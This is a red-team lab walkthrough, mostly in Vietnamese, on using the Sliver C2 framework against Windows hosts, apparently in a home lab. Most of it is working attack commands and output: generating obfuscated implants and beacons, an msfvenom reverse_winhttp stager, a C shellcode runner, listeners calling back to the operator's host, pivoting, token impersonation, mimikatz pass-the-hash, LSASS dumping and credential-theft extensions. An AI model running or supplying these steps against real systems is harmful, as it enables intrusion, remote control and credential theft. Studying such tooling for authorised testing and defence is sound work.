Sliver
Last updated
Last updated
sudo apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
curl https://sliver.sh/install|sudo bashsystemctl start sliver
systemctl status sliverConfig authen
└─$ sliver
Connecting to localhost:31337 ...
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options
[*] Check for updates with the 'update' command
sliver > Trong Sliver thì C2 agent được gọi là implant
Sliver hỡ trợ 2 mode implant là beacons và sessions
Tham khảo: https://sliver.sh/docs?name=Getting+Started
Sliver implants in v1.5 and later support two modes of operation: "beacon mode" and "session mode." Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server retrieves tasks, executes them, and returns the results. In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol.
Hiểu đơn giản thì beacon mode giống beacon Cobalt Strike còn session mode thì giống Metasploit
sliver > generate --mtls <C2 server ip> --os windows --arch amd64 --format exe --save /tmp/shell.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 44s
[*] Implant saved to /tmp/shell.exeStart mtls listner
sliver > mtls
[*] Starting mTLS listener ...
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port Stage Profile
==== ====== ========== ====== ===============
1 mtls tcp 8888
sliver >
Tương tác với sessions
[*] Session bb86e5a5 DIGITAL_ATTENTION - 192.168.179.11:59818 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 22:59:29 EST
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== =================== =========== ====================== ================== ========================= ================== ======== ======================================== =========
bb86e5a5 DIGITAL_ATTENTION mtls 192.168.179.11:59818 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 22:59:29 EST 2024 (23s ago) [ALIVE]
sliver > use
? Select a session or beacon: SESSION bb86e5a5 DIGITAL_ATTENTION 192.168.179.11:59818 DomainController ENDY-COMP\administrator windows/amd64
[*] Active session DIGITAL_ATTENTION (bb86e5a5-82e0-4562-80db-02dab7f3e0d9)
sliver (DIGITAL_ATTENTION) > info
Session ID: bb86e5a5-82e0-4562-80db-02dab7f3e0d9
Name: DIGITAL_ATTENTION
Hostname: DomainController
UUID: 6d114d56-3846-0706-4bad-06bcafa25169
Username: ENDY-COMP\administrator
UID: S-1-5-21-3689512688-2841538555-566222747-500
GID: S-1-5-21-3689512688-2841538555-566222747-513
PID: 5468
OS: windows
Version: Server 2016 build 14393 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://192.168.179.132:8888
Remote Address: 192.168.179.11:59818
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
Last Checkin: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)Exit
sliver (DIGITAL_ATTENTION) > background
[*] Background ...
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== =================== =========== ====================== ================== ========================= ================== ======== ========================================= =========
75da56b4 DIGITAL_ATTENTION mtls 192.168.179.11:59853 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 23:03:57 EST 2024 (1m4s ago) [ALIVE]
sliver > sessions -k 75da56b4
[!] Lost session 75da56b4 DIGITAL_ATTENTION - 192.168.179.11:59853 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:05:21 EST
sliver >sliver > generate beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --save /tmp/beacon.exe --seconds 5 --jitter 3
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 29s
[*] Implant saved to /tmp/beacon.exeTương tác với beacons
[*] Beacon be2fe170 DETERMINED_JUNKET - 192.168.179.11:59885 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:10:34 EST
sliver > beacons
ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In
========== =================== ======= =========== ====================== ================== ========================= ================== ======== ======================================= ======================================
be2fe170 DETERMINED_JUNKET 0/0 mtls 192.168.179.11:59885 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 23:10:47 EST 2024 (3s ago) Sat Dec 21 23:10:52 EST 2024 (in 2s)
sliver > use
? Select a session or beacon: BEACON be2fe170 DETERMINED_JUNKET 192.168.179.11:59885 DomainController ENDY-COMP\administrator windows/amd64
[*] Active beacon DETERMINED_JUNKET (be2fe170-f919-47fe-8c3d-9ed9fb54ee99)
sliver (DETERMINED_JUNKET) > info
Beacon ID: be2fe170-f919-47fe-8c3d-9ed9fb54ee99
Name: DETERMINED_JUNKET
Hostname: DomainController
UUID: 6d114d56-3846-0706-4bad-06bcafa25169
Username: ENDY-COMP\administrator
UID: S-1-5-21-3689512688-2841538555-566222747-500
GID: S-1-5-21-3689512688-2841538555-566222747-513
PID: 5484
OS: windows
Version: Server 2016 build 14393 x86_64
Locale: en-US
Arch: amd64
Active C2: mtls://192.168.179.132:8888
Remote Address: 192.168.179.11:59885
Proxy URL:
Interval: 5s
Jitter: 3s
First Contact: Sat Dec 21 23:10:34 EST 2024 (24s ago)
Last Checkin: Sat Dec 21 23:10:53 EST 2024 (5s ago)
Next Checkin: Sat Dec 21 23:10:58 EST 2024 (0s ago)
sliver (DETERMINED_JUNKET) > Check tasks
sliver (DETERMINED_JUNKET) > tasks
ID State Message Type Created Sent Completed
========== =========== ============== =============================== =============================== ===============================
2b2aec2f completed Screenshot Sat, 21 Dec 2024 23:12:08 EST Sat, 21 Dec 2024 23:12:12 EST Sat, 21 Dec 2024 23:12:12 EST
9ecc207b completed Execute Sat, 21 Dec 2024 23:12:04 EST Sat, 21 Dec 2024 23:12:06 EST Sat, 21 Dec 2024 23:12:06 EST
Đổi config beacons
sliver (DETERMINED_JUNKET) > reconfig -i 5s -j 1s
[*] Tasked beacon DETERMINED_JUNKET (428cea99)
[+] DETERMINED_JUNKET completed task 428cea99
[*] Reconfigured beacon Chuyển beacons thành sessions
sliver (DETERMINED_JUNKET) > interactive
[*] Using beacon's active C2 endpoint: mtls://192.168.179.132:8888
[*] Tasked beacon DETERMINED_JUNKET (51e7cb02)
[*] Session caee6edb DETERMINED_JUNKET - 192.168.179.11:59967 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:17:21 EST
sliver (DETERMINED_JUNKET) >Có thể chuyển sesion với protocol khác
sliver > interactive --help
Task a beacon to open an interactive session (Beacon only)
Usage:
======
interactive [flags]
Flags:
======
-d, --delay string delay opening the session (after checkin) for a given period of time (default: 0s)
-n, --dns string dns connection strings
-h, --help display help
-b, --http string http(s) connection strings
-m, --mtls string mtls connection strings
-p, --named-pipe string namedpipe connection strings
-i, --tcp-pivot string tcppivot connection strings
-t, --timeout int command timeout in seconds (default: 60)
-g, --wg string wg connection stringsBeacons thì có thể chuyển thành sesson như session thì không thể chuyển thành beacon
Một cố command như shell và portfwd thì chỉ hoạt động với sessions
Tạo profiles để generate cho nhanh
Profiles session
sliver > profiles new --mtls 192.168.179.132 --os windows --arch amd64 --format exe session_win_default
[*] Saved new implant profile session_win_default
sliver > profiles
Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations
===================== ============== =============== ================================= ======= ============ ============= =============
session_win_default session windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled
sliver > profiles generate --save /tmp/shell.exe session_win_default
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 24s
[*] Implant saved to /tmp/shell.exe
sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default
[*] Saved new implant profile (beacon) beacon_win_default
Profile beacon
sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default
[*] Saved new implant profile (beacon) beacon_win_default
sliver > profiles
Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations
===================== ============== =============== ================================= ======= ============ ============= =============
beacon_win_default beacon windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled
session_win_default session windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled
sliver > profiles generate --save /tmp/beacon.exe beacon_win_default
[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/beacon.exe
Get danh sách các implants
sliver > implants
Name Implant Type Template OS/Arch Format Command & Control Debug
=================== ============== ========== =============== ============ ================================= =======
DETERMINED_JUNKET beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
DIGITAL_ATTENTION session sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
EASY_BROOM session sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
FRESH_AUDIENCE beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false
TALL_POST beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.122.111:8888 false Xóa implants
sliver > implants rm TALL_POST
? Remove 'TALL_POST' build? Yes
Tạo stager đầu tiên cần tạo 1 profile với format shellcode
sliver > profiles new --http 192.168.179.132 --format shellcode win-shellcode
[*] Saved new implant profile win-shellcodeTạo listener
sliver > https
[*] Starting HTTPS :443 listener ...
[*] Successfully started job #1
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== ===============
1 https tcp 443
Tạo stage-listener cho profile để delivery payload. Nhớ thêm prepend-size
sliver > stage-listener --url http://192.168.179.132:1234 --profile win-shellcode --prepend-size
[*] No builds found for profile win-shellcode, generating a new one
[*] Sliver name for profile win-shellcode: UNNECESSARY_DICTAPHONE
[*] Job 8 (http) started
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ====== =====================================================
7 https tcp 443
8 http tcp 1234 win-shellcode (Sliver name: UNNECESSARY_DICTAPHONE) Gen payload để load stager bằng msfvenom. Lưu ý dùng shell custom mới ăn còn dùng meterpreter thì không ăn
msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.179.132 LPORT=1234 LURI=/hello.woff --format exe --out /tmp/stager.exeHoặc có thể gen ra format c rồi dùng code sau để load
#include "windows.h"
int main()
{
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
...
"\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
"\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff"
"\xd5";
void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, shellcode, sizeof shellcode);
((void(*)())exec)();
return 0;
}Compile
x86_64-w64-mingw32-gcc -o shellrunner.exe shellrunner.cSau khi kích file thì phải đợi 5-10s sau mới có sessions về (đôi khi nó về sesions nhưng không có alert nên cứ check sessions cho chắc)
Sliver cho phép thực thi .net assembly tương tự như Cobalt Strike.
sliver (BROKEN_LIQUID) > execute-assembly /home/kali/tools/Ghostpack-CompiledBinaries/Seatbelt.exe
[*] Output:
%&&@@@&&
&&&&&&&%%%, #&&@@@@@@%%%%%%###############%
&%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####
###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####
#####%###################### %%%.. @////(((&%%%%%%%################
&%& %%%%% Seatbelt %////(((&%%%%%%%%#############*
&%%&&&%%%%% v1.2.1 ,(((&%%%%%%%%%%%%%%%%%,
#%%%%##,
ERROR: Error running command ""
[*] Completed collection in 0.006 seconds
sliver (BROKEN_LIQUID) > socks5 --help
In-band SOCKS5 Proxy
Usage:
======
socks5 [flags]
Flags:
======
-h, --help display help
-t, --timeout int router timeout in seconds (default: 60)
Sub Commands:
=============
start Start an in-band SOCKS5 proxy
stop Stop a SOCKS5 proxy
sliver (BROKEN_LIQUID) > socks5 start
[*] Started SOCKS5 127.0.0.1 1081
⚠ In-band SOCKS proxies can be a little unstable depending on protocol
sliver (BROKEN_LIQUID) > socks5
ID Session ID Bind Address Username Passwords
==== ====================================== ================ ========== ===========
1 762b70da-f0db-4d20-ada9-a155f4a1ce7d 127.0.0.1:1081
sliver (BROKEN_LIQUID) > socks5 stop -i 1
[*] Removed socks5
sliver (BROKEN_LIQUID) > Theo cảm nhận của mình thì độ stable không ngon bằng Cobalt Strike lắm
sliver (SPICY_JAW) > portfwd --help
In-band TCP port forwarding
Usage:
======
portfwd [flags]
Flags:
======
-h, --help display help
-t, --timeout int command timeout in seconds (default: 60)
Sub Commands:
=============
add Create a new port forwarding tunnel
rm Remove a port forwarding tunnel
sliver (SPICY_JAW) > portfwd add -b 127.0.0.1:9999 -r 192.168.17.138:445
[*] Port forwarding 127.0.0.1:9999 -> 192.168.17.138:445
Bind port 9999 tại local với port 445 tại 192.168.17.138
Remove portfw
sliver (SPICY_JAW) > portfwd
ID Session ID Bind Address Remote Address
==== ====================================== ================ ====================
1 b0653816-faa9-4975-b28b-92165d4a6085 127.0.0.1:9999 192.168.17.138:445
sliver (SPICY_JAW) > portfwd rm -i 1
[*] Removed portfwd
Pivot chỉ dùng được với sesions còn beacons thì không
Tạo tcp pivots trên sesons
sliver (BROKEN_LIQUID) > pivots tcp
[*] Started tcp pivot listener :9898 with id 1
sliver (BROKEN_LIQUID) > pivots
ID Protocol Bind Address Number Of Pivots
==== ========== ============== ==================
1 TCP :9898 0
sliver (BROKEN_LIQUID) >Gen shell để call về C2
sliver > generate --tcp-pivot 192.168.17.137:9898 --os windows --arch amd64 --format exe --save /tmp/pivot.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /tmp/pivot.exe
Với ip ở đây sẽ là IP của sessions mà có thể giao tiếp với target.
Up hàng lên máy target rồi kích hoạt ta sẽ có được sesions qua đường tunnel TCP
Start namepipe trên session
sliver > use 982155fd
[*] Active session BROKEN_LIQUID (982155fd-407a-434b-8686-e4af57c1f295)
sliver (BROKEN_LIQUID) > pivots named-pipe --bind foobar
[*] Started named pipe pivot listener \\.\pipe\foobar with id 2
Gen shell để call về C2
sliver > generate --named-pipe 192.168.17.137/pipe/foobar --os windows --arch amd64 --format exe --save /tmp/pivot.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 34s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/pivot.exe
Tương tự trên thì IP cũng là IP của sessions mà có thể giao tiếp với target.
Kết quả:
Stop pivot
sliver (BROKEN_LIQUID) > pivots stop -i 1
[*] Stopped pivot listenersliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ================== =========== ======================= ========== ========================= ================== ======== ======================================= =========
0456ae36 BEAUTIFUL_REPORT http(s) 192.168.179.137:49870 WinA ENDY-COMP\administrator windows/amd64 en-US Sat Jan 4 22:50:55 EST 2025 (2s ago) [ALIVE]
sliver > use 0456ae36
[*] Active session BEAUTIFUL_REPORT (0456ae36-c402-45b7-b111-8f83916b3048)
sliver (BEAUTIFUL_REPORT) > rename -n WinA
[*] Renamed implant to WinA
sliver > sessions
ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health
========== ====== =========== ======================= ========== ========================= ================== ======== ======================================= =========
0456ae36 WinA http(s) 192.168.179.137:49870 WinA ENDY-COMP\administrator windows/amd64 en-US Sat Jan 4 23:06:52 EST 2025 (1s ago) [ALIVE]
sliver >
sliver (WinA) > download desktop.ini /home/kali/test
[*] Wrote 282 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/test
sliver (WinA) > upload /home/kali/test test
[*] Wrote file to C:\Users\Administrator\Desktop\test
sliver (BEAUTIFUL_REPORT) > shell
? This action is bad OPSEC, are you an adult? Yes
[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...
[*] Started remote shell with pid 2844
PS C:\Users\Administrator\Desktop> Shell exited
sliver (BEAUTIFUL_REPORT) >
Nhấn Ctrl+D để exit
sliver (WinA) > execute -o whoami /all
[*] Output:
USER INFORMATION
----------------
User Name SID
================== ===========================================
wina\administrator S-1-5-21-2122276757-511757396-437061769-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
sliver (WinA) > ls \\\\192.168.17.138\\Share
\\192.168.17.138\ (0 items, 0 B)
================================
sliver (WinA) > make-token -u userB -p Password123 -d .
[*] Successfully impersonated .\userB. Use `rev2self` to revert to your previous token.
sliver (WinA) > ls \\\\192.168.17.138\\Share
\\192.168.17.138\Share\ (1 item, 0 B)
=====================================
-rw-rw-rw- 123.txt 0 B Sat Jan 04 21:48:13 -0800 2025
sliver (WinA) >Dùng rev2self để clear token
sliver (LOVELY_STAR) > upload /home/kali/tools/mimikatz/x64/mimikatz.exe mimikatz.exe
[*] Wrote file to C:\Users\Administrator\Desktop\mimikatz.exe
sliver (LOVELY_STAR) > execute -o mimikatz.exe "privilege::debug" "sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:\"powershell -w hidden\"" "exit"
[*] Output:
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:"powershell -w hidden"
user : userB
domain : .
program : powershell -w hidden
impers. : no
NTLM : 58a478135a93ac3bf058a5ea0e8fdb71
| PID 3048
| TID 1900
| LSA Process is now R/W
| LUID 0 ; 2745069 (00000000:0029e2ed)
\_ msv1_0 - data copy @ 000001E1308E1CF0 : OK !
\_ kerberos - data copy @ 000001E12FD0DB98
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001E12FD3A208 (32) -> null
mimikatz(commandline) # exit
Bye!sliver (WinA) > procdump --pid 672 --save lsass.dmp
[*] Process dump stored in: lsass.dmpminidump lsa
┌──(kali㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.dmp
INFO:pypykatz:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 113459 (1bb33)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server
logon_time 2025-01-05T07:49:38.007112+00:00
sid S-1-5-7
luid 113459
....sliver (WinA) > sideload /home/kali/tools/mimikatz/x64/mimikatz.exe "privilege::debug" "exit"
[*] Output:
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # exit
Bye!
amory là extension package manager của sliver, cho phép ta download thêm package
sliver > armoryInstall package
sliver > armory install windows-credentials
[*] Installing extension 'coff-loader' (v1.0.14) ... done!
[*] Installing extension 'nanodump' (v0.0.5) ... done!
[*] Installing extension 'credman' (v1.0.7) ... done!
[*] Installing extension 'chromiumkeydump' (v0.0.2) ... done!
[*] Installing extension 'handlekatz' (v0.0.1) ... done!
[*] Installing extension 'mimikatz' (v0.0.1) ... done!
